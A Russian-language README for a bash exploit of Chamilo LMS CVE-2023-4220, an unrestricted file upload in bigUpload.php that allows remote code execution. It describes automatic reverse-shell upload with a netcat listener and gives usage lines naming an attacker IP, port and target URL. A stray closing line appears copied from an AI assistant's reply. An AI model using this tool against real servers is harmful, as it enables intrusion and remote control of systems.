
Refurbish Chamilo LMS CVE-2023-4220 эксплойт, написанный на bash
Этот скрипт эксплуатирует уязвимость удаленного выполнения кода (RCE) в Chamilo LMS версий ≤ v1.11.24. Уязвимость (CVE-2023-4220) существует из-за неограниченной загрузки файлов в функции bigUpload.php Chamilo LMS, что позволяет злоумышленникам загружать произвольные файлы (например, веб-шеллы) и выполнять их, что приводит к полному удаленному выполнению кода на сервере.
Этот скрипт был улучшен Divine Clown для упрощения процесса эксплуатации: он автоматически генерирует файл обратной оболочки, загружает его на цель и запускает слушатель, предоставляя атакующему прямой доступ к оболочке.
/main/inc/lib/javascript/bigupload/inc/bigUpload.phpbigUpload.php../CVE-2023-4220.sh -i <attacker_ip> -p <port> -h <host_link>
-i <attacker_ip>: IP-адрес атакующего для обратной оболочки.-p <port>: Порт, на котором будет запущен слушатель Netcat.-h <host_link>: Полный URL уязвимого экземпляра Chamilo LMS../CVE-2023-4220.sh -i 10.10.14.15 -p 9001 -h http://target-site.com
Этот инструмент предназначен исключительно для образовательных целей и тестовых сред, где у вас есть явное разрешение на эксплуатацию уязвимостей. Несанкционированный доступ к системам является незаконным и может привести к уголовному преследованию. Авторы не несут ответственности за любое неправомерное использование или ущерб, причиненный этим скриптом.
Не стесняйтесь изменять README дальше, если хотите добавить дополнительную информацию или форматирование! Дайте знать, если вам потребуется что-то еще.